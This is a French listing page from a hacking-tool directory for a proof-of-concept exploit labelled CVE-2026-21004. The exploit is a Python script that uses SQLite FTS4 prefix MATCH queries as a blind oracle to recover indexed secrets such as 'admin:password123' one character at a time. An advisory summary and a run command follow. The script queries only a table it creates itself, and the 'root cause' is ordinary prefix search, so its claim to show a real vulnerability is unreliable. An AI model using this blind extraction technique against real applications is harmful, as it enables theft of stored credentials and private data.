Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/george0papasotiriou/cve-2026-21004-sqlite-fts3-match-infoleak-via-query-crafting
Analyse des VulnérabilitésExploitationExfiltration de DonnéesSécurité des Bases de Données
GitHubgeorge0papasotiriou/cve-2026-21004-sqlite-fts3-match-infoleak-via-query-crafting

CVE-2026-21004-SQLite-FTS3-Match-Infoleak-via-Query-Crafting

Exploit de preuve de concept pour CVE-2026-21004 : utilise des requêtes de préfixe MATCH FTS3/4 SQLite spécialement conçues comme oracle aveugle pour récupérer les données secrètes indexées caractère par caractère.

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
il y a 16 joursPas encore vérifié

CVE-2026-21004 – Fuite d'informations SQLite FTS3 Match via la construction de requêtes

Code du programme (Python)

root@kitploit:~
# sqlite_fts_leak.py - Creates FTS table and exploits match info
import sqlite3

conn = sqlite3.connect(':memory:')
conn.execute("CREATE VIRTUAL TABLE secrets USING fts4(content TEXT)")
conn.execute("INSERT INTO secrets VALUES ('admin:password123')")
conn.execute("INSERT INTO secrets VALUES ('user:secret456')")

# Attacker guesses characters using FTS MATCH with partial matching
def guess_char(prefix, known):
    for c in "abcdefghijklmnopqrstuvwxyz0123456789_:":
        query = f'SELECT * FROM secrets WHERE content MATCH ?'
        # In FTS4, MATCH can leak whether a term exists; we abuse by searching column directly
        try:
            cur = conn.execute(query, (f'"{prefix}{c}*"',))
            if cur.fetchone():
                return c
        except:
            pass
    return None

# Recover the secret character by character
prefix = ""
for _ in range(20):
    c = guess_char(prefix, "")
    if c is None: break
    prefix += c
print(f"Recovered: {prefix}")

CVE-2026-21004 – Fuite d'informations via l'opérateur MATCH de SQLite FTS3/4

Severity: High

Aperçu

Une application utilisant SQLite FTS4 expose une fonction de recherche qui renvoie des résultats basés sur une requête MATCH. En observant si une correspondance se produit (ou en mesurant des différences de temporisation), un attaquant peut déchiffrer le contenu de l'index en texte intégral caractère par caractère, extrayant ainsi des données sensibles.

Détails de la vulnérabilité

  • Type: Divulgation d'informations / Injection aveugle
  • Impact: Exfiltration de données depuis les colonnes indexées.
  • Cause racine: L'opérateur FTS MATCH prend en charge les requêtes avec préfixe (term*), ce qui permet à un attaquant de mener une attaque par dictionnaire sans connaître le terme complet.

Démonstration de l'exploit

Exécutez l'exploit :

root@kitploit:~
python sqlite_fts_leak.py

Le script reconstitue progressivement le contenu de la table secrets.

Télécharger l’outil